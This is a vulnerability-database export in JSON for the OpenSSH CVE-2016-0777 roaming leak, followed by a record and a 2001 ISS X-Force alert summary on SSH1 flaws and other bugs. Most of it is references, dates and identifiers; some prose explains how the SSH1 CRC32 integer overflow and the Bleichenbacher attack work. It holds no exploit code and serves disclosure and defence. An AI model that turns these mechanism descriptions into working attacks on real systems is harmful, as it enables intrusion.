"reference": "https://www.scap.org.cn/vuln/vhn-88287",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-88287"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-0777",
"trust": 3.6
},
{
"db": "JUNIPER",
"id": "JSA10734",
"trust": 2.4
},
{
"db": "BID",
"id": "80695",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "135273",
"trust": 1.9
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2016/01/14/7",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1034671",
"trust": 1.8
},
{
"db": "SIEMENS",
"id": "SSA-412672",
"trust": 1.8
},
{
"db": "CERT/CC",
"id": "VU#456088",
"trust": 1.5
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249",
"trust": 0.7
},
{
"db": "JUNIPER",
"id": "JSA10774",
"trust": 0.6
},
{
"db": "BID",
"id": "80698",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "135282",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "135259",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "135283",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135250",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135281",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135263",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-88287",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-22-349-21",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-0777",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "138552",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "135282"
},
{
"db": "PACKETSTORM",
"id": "138552"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"id": "VAR-201601-0029",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-88287"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T19:54:41.157000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "OpenSSH Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59596"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/"
},
{
"title": "Ubuntu Security Notice: openssh vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1"
},
{
"title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8"
},
{
"title": "Debian Security Advisories: DSA-3446-1 openssh -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69"
},
{
"title": "Red Hat: CVE-2016-0777",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0777"
},
{
"title": "Amazon Linux AMI: ALAS-2016-638",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638"
},
{
"title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83"
},
{
"title": "sshtron",
"trust": 0.1,
"url": "https://github.com/zachlatta/sshtron "
},
{
"title": "repassh",
"trust": 0.1,
"url": "https://github.com/dyuri/repassh "
},
{
"title": "docker-sshtron",
"trust": 0.1,
"url": "https://github.com/jaymoulin/docker-sshtron "
},
{
"title": "sshtron",
"trust": 0.1,
"url": "https://github.com/marcospedreiro/sshtron "
},
{
"title": "Linux_command_crash_course",
"trust": 0.1,
"url": "https://github.com/akshayprasad/linux_command_crash_course "
},
{
"title": "gameserverB",
"trust": 0.1,
"url": "https://github.com/jcdad3000/gameserverb "
},
{
"title": "GameServer",
"trust": 0.1,
"url": "https://github.com/jcdad3000/gameserver "
},
{
"title": "fabric2",
"trust": 0.1,
"url": "https://github.com/winstonn/fabric2 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/cpcloudnl/ssh-config "
},
{
"title": "puppet-module-ssh",
"trust": 0.1,
"url": "https://github.com/ghoneycutt/puppet-module-ssh "
},
{
"title": "nmap",
"trust": 0.1,
"url": "https://github.com/project7io/nmap "
},
{
"title": "DC-2-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough "
},
{
"title": "DC-1-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough "
},
{
"title": "satellite-host-cve",
"trust": 0.1,
"url": "https://github.com/redhatsatellite/satellite-host-cve "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.openssh.com/txt/release-7.1p2"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/80695"
},
{
"trust": 2.4,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
},
{
"trust": 2.4,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
},
{
"trust": 2.4,
"url": "http://www.debian.org/security/2016/dsa-3446"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded"
},
{
"trust": 1.8,
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"trust": 1.8,
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"trust": 1.8,
"url": "https://bto.bluecoat.com/security-advisory/sa109"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680"
},
{
"trust": 1.8,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht206167"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175592.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175676.html"
},
{
"trust": 1.8,
"url": "https://security.freebsd.org/advisories/freebsd-sa-16:07.openssh.asc"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/jan/44"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/201601-01"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2016/01/14/7"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1034671"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html"
},
{
"trust": 1.8,
"url": "http://www.ubuntu.com/usn/usn-2869-1"
},
{
"trust": 1.7,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734"
},
{
"trust": 1.5,
"url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt"
},
{
"trust": 1.4,
"url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig"
},
{
"trust": 1.4,
"url": "http://www.ubuntu.com/usn/usn-2869-1/"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777"
},
{
"trust": 0.8,
"url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733"
},
{
"trust": 0.8,
"url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70"
},
{
"trust": 0.8,
"url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/articles/2123781"
},
{
"trust": 0.8,
"url": "https://security-tracker.debian.org/tracker/cve-2016-0778"
},
{
"trust": 0.7,
"url": "https://www.kb.cert.org/vuls/id/456088"
},
{
"trust": 0.7,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375"
},
{
"trust": 0.6,
"url": "http://www.openssh.com"
},
{
"trust": 0.6,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.6,
"url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss"
},
{
"trust": 0.6,
"url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319"
},
{
"trust": 0.6,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138"
},
{
"trust": 0.6,
"url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc"
},
{
"trust": 0.6,
"url": "https://securityadvisories.paloaltonetworks.com/home/detail/44"
},
{
"trust": 0.6,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044"
},
{
"trust": 0.6,
"url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh"
},
{
"trust": 0.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777"
},
{
"trust": 0.3,
"url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:07.openssh.asc"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975158"
},
{
"trust": 0.1,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://github.com/zachlatta/sshtron"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
},
{
"trust": 0.1,
"url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/14.html"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/244.html"
},
{
"trust": 0.1,
"url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://www.openssh.com/legacy.html"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
},
{
"trust": 0.1,
"url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3200"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/security_bulletin_archive"
},
{
"trust": 0.1,
"url": "https://www.hpe.com/info/report-security-vulnerability"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/subscriber_choice"
},
{
"trust": 0.1,
"url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "135282"
},
{
"db": "PACKETSTORM",
"id": "138552"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "VULHUB",
"id": "VHN-88287"
},
{
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "BID",
"id": "80695"
},
{
"db": "PACKETSTORM",
"id": "135273"
},
{
"db": "PACKETSTORM",
"id": "135259"
},
{
"db": "PACKETSTORM",
"id": "135282"
},
{
"db": "PACKETSTORM",
"id": "138552"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-14T00:00:00",
"db": "CERT/CC",
"id": "VU#456088"
},
{
"date": "2016-01-14T00:00:00",
"db": "VULHUB",
"id": "VHN-88287"
},
{
"date": "2016-01-14T00:00:00",
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"date": "2016-01-14T00:00:00",
"db": "BID",
"id": "80698"
},
{
"date": "2016-01-14T00:00:00",
"db": "BID",
"id": "80695"
},
{
"date": "2016-01-15T02:09:54",
"db": "PACKETSTORM",
"id": "135273"
},
{
"date": "2016-01-15T00:03:14",
"db": "PACKETSTORM",
"id": "135259"
},
{
"date": "2016-01-15T13:35:04",
"db": "PACKETSTORM",
"id": "135282"
},
{
"date": "2016-08-30T14:19:12",
"db": "PACKETSTORM",
"id": "138552"
},
{
"date": "2016-01-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"date": "2016-01-14T22:59:01.140000",
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-20T00:00:00",
"db": "CERT/CC",
"id": "VU#456088"
},
{
"date": "2022-12-13T00:00:00",
"db": "VULHUB",
"id": "VHN-88287"
},
{
"date": "2022-12-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-0777"
},
{
"date": "2017-01-23T03:06:00",
"db": "BID",
"id": "80698"
},
{
"date": "2017-01-23T04:05:00",
"db": "BID",
"id": "80695"
},
{
"date": "2022-12-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-249"
},
{
"date": "2022-12-13T12:15:18.887000",
"db": "NVD",
"id": "CVE-2016-0777"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "138552"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow",
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-249"
}
],
"trust": 0.6
}
}
VAR-200106-0080
Vulnerability from variot - Updated: 2024-07-23 19:26Implementations of SSH version 1.5, including (1) OpenSSH up to version 2.3.0, (2) AppGate, and (3) ssh-1 up to version 1.2.31, in certain configurations, allow a remote attacker to decrypt and/or alter traffic via a "Bleichenbacher attack" on PKCS#1 version 1.5. An implementation problem in at least one Secure Shell (SSH) product and a weakness in the PKCS#1_1.5 public key encryption standard allows attackers to recover plaintext of messages encrypted with SSH. Multiple Cisco networking products contain a denial-of-service vulnerability. There is an information integrity vulnerability in the SSH1 protocol that allows packets encrypted with a block cipher to be modified without notice. There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol that allows an attacker to execute arbitrary code with the privileges of the SSH daemon, typically root. The program pgp4pine version 1.75.6 fails to properly identify expired keys when working with the Gnu Privacy Guard program (GnuPG). This failure may result in the clear-text transmission of senstive information when used with the PINE mail reading package. The SEDUM web server permits intruders to access files outside the web root. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory. This would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value). As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory. UPDATE: There have been reports suggesting that exploitation of this vulnerability may be widespread. Since early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available. NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable. Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH. ** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. The data encryption techniques described in RSA's PKCS #1 standard are used in many protocols which rely on, at least in part, the security provided by public-key cryptography systems. Several protocols which implement the digital enveloping method described in version 1.5 of the PKCS #1 standard are susceptible to an adaptive ciphertext attack which may allow the recovery of session keys, thus compromising the integrity of the data transmitting during that session. By capturing and logging the packets transmitted between a client and a server, an opponent could make use of a captured encrypted session key to launch a Bleichenbacher attack together with a simple timing attack. If the session key is successfully decrypted, the saved packets can easily be decrypted in a uniform manner. Interactive key establishment protocols, such as SSH or SSL, are generally significantly more susceptible to successful attacks. Cisco has reported that scanning for SSH vulnerabilities on affected devices will cause excessive CPU consumption. The condition is due to a failure of the Cisco SSH implementation to properly process large SSH packets. As many of these devices are critical infrastructure components, more serious network outages may occur. Cisco has released upgrades that will eliminate this vulnerability. An expired public key could cause GPG to fail the encryption of an outgoing message, without any error message or warning being delivered to the user. As a result, the user could transmit data, meant to be encrypted, as plaintext. TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to majordomo@iss.net Contact alert-owner@iss.net for help with any problems!
-----BEGIN PGP SIGNED MESSAGE-----
ISS X-Force has received reports that some individuals were unable to verify the PGP signature on the Security Alert Summary distributed earlier in the week. Due to this issue, X-Force is re-distributing the Security Alert Summary. We apologize for any inconvience this may have caused.
Internet Security Systems Security Alert Summary March 5, 2001 Volume 6 Number 4
X-Force Vulnerability and Threat Database: http://xforce.iss.net/ To receive these Alert Summaries as well as other Alerts and Advisories, subscribe to the Internet Security Systems Alert mailing list at: http://xforce.iss.net/maillists/index.php
This summary can be found at http://xforce.iss.net/alerts/vol-6_num-4.php
Contents
90 Reported Vulnerabilities
Risk Factor Key
Date Reported: 2/27/01 Vulnerability: a1-server-dos Platforms Affected: A1 Server Risk Factor: Medium Attack Type: Network Based Brief Description: A1 Server denial of service X-Force URL: http://xforce.iss.net/static/6161.php
Date Reported: 2/27/01 Vulnerability: a1-server-directory-traversal Platforms Affected: A1 Server Risk Factor: Medium Attack Type: Network Based Brief Description: A1 Server directory traversal X-Force URL: http://xforce.iss.net/static/6162.php
Date Reported: 2/27/01 Vulnerability: webreflex-web-server-dos Platforms Affected: WebReflex Risk Factor: Medium Attack Type: Network Based Brief Description: WebReflex Web server denial of service X-Force URL: http://xforce.iss.net/static/6163.php
Date Reported: 2/26/01 Vulnerability: sudo-bo-elevate-privileges Platforms Affected: Sudo Risk Factor: Medium Attack Type: Host Based Brief Description: Sudo buffer overflow could allow elevated user privileges X-Force URL: http://xforce.iss.net/static/6153.php
Date Reported: 2/26/01 Vulnerability: mygetright-skin-overwrite-file Platforms Affected: My GetRight Risk Factor: High Attack Type: Network Based Brief Description: My GetRight 'skin' allows remote attacker to overwrite existing files X-Force URL: http://xforce.iss.net/static/6155.php
Date Reported: 2/26/01 Vulnerability: mygetright-directory-traversal Platforms Affected: My GetRight Risk Factor: Medium Attack Type: Network Based Brief Description: My GetRight directory traversal X-Force URL: http://xforce.iss.net/static/6156.php
Date Reported: 2/26/01 Vulnerability: win2k-event-viewer-bo Platforms Affected: Windows 2000 Risk Factor: once-only Attack Type: Host Based Brief Description: Windows 2000 event viewer buffer overflow X-Force URL: http://xforce.iss.net/static/6160.php
Date Reported: 2/26/01 Vulnerability: netscape-collabra-cpu-dos Platforms Affected: Netscape Risk Factor: Medium Attack Type: Network Based Brief Description: Netscape Collabra CPU denial of service X-Force URL: http://xforce.iss.net/static/6159.php
Date Reported: 2/26/01 Vulnerability: netscape-collabra-kernel-dos Platforms Affected: Netscape Risk Factor: Medium Attack Type: Network Based Brief Description: Netscape Collabra Server kernel denial of service X-Force URL: http://xforce.iss.net/static/6158.php
Date Reported: 2/23/01 Vulnerability: mercur-expn-bo Platforms Affected: MERCUR Risk Factor: High Attack Type: Network Based Brief Description: MERCUR Mailserver EXPN buffer overflow X-Force URL: http://xforce.iss.net/static/6149.php
Date Reported: 2/23/01 Vulnerability: sedum-http-dos Platforms Affected: SEDUM Risk Factor: Medium Attack Type: Network Based Brief Description: SEDUM HTTP server denial of service X-Force URL: http://xforce.iss.net/static/6152.php
Date Reported: 2/23/01 Vulnerability: tru64-inetd-dos Platforms Affected: Tru64 Risk Factor: Medium Attack Type: Host Based Brief Description: Tru64 UNIX inetd denial of service X-Force URL: http://xforce.iss.net/static/6157.php
Date Reported: 2/22/01 Vulnerability: outlook-vcard-bo Platforms Affected: Microsoft Outlook Risk Factor: High Attack Type: Host Based Brief Description: Outlook and Outlook Express vCards buffer overflow X-Force URL: http://xforce.iss.net/static/6145.php
Date Reported: 2/22/01 Vulnerability: ultimatebb-cookie-member-number Platforms Affected: Ultimate Bulletin Board Risk Factor: High Attack Type: Network Based Brief Description: Ultimate Bulletin Board cookie allows attacker to change member number X-Force URL: http://xforce.iss.net/static/6144.php
Date Reported: 2/21/01 Vulnerability: ultimatebb-cookie-gain-privileges Platforms Affected: Ultimate Bulletin Board Risk Factor: Medium Attack Type: Network Based Brief Description: Ultimate Bulletin Board allows remote attacker to obtain cookie information X-Force URL: http://xforce.iss.net/static/6142.php
Date Reported: 2/21/01 Vulnerability: sendmail-elevate-privileges Platforms Affected: Sendmail Risk Factor: High Attack Type: Host Based Brief Description: Sendmail -bt command could allow the elevation of privileges X-Force URL: http://xforce.iss.net/static/6147.php
Date Reported: 2/21/01 Vulnerability: jre-jdk-execute-commands Platforms Affected: JRE/JDK Risk Factor: High Attack Type: Host Based Brief Description: JRE/JDK could allow unauthorized execution of commands X-Force URL: http://xforce.iss.net/static/6143.php
Date Reported: 2/20/01 Vulnerability: licq-remote-port-dos Platforms Affected: LICQ Risk Factor: Medium Attack Type: Network Based Brief Description: LICQ remote denial of service X-Force URL: http://xforce.iss.net/static/6134.php
Date Reported: 2/20/01 Vulnerability: pgp4pine-expired-keys Platforms Affected: pgp4pine Risk Factor: Medium Attack Type: Host Based Brief Description: pgp4pine may transmit messages using expired public keys X-Force URL: http://xforce.iss.net/static/6135.php
Date Reported: 2/20/01 Vulnerability: chilisoft-asp-view-files Platforms Affected: Chili!Soft ASP Risk Factor: High Attack Type: Network Based Brief Description: Chili!Soft ASP allows remote attackers to gain access to sensitive information X-Force URL: http://xforce.iss.net/static/6137.php
Date Reported: 2/20/01 Vulnerability: win2k-domain-controller-dos Platforms Affected: Windows 2000 Risk Factor: once-only Attack Type: Network/Host Based Brief Description: Windows 2000 domain controller denial of service X-Force URL: http://xforce.iss.net/static/6136.php
Date Reported: 2/19/01 Vulnerability: asx-remote-dos Platforms Affected: ASX Switches Risk Factor: Medium Attack Type: Network Based Brief Description: ASX switches allow remote denial of service X-Force URL: http://xforce.iss.net/static/6133.php
Date Reported: 2/18/01 Vulnerability: http-cgi-mailnews-username Platforms Affected: Mailnews.cgi Risk Factor: High Attack Type: Network Based Brief Description: Mailnews.cgi allows remote attacker to execute shell commands using username X-Force URL: http://xforce.iss.net/static/6139.php
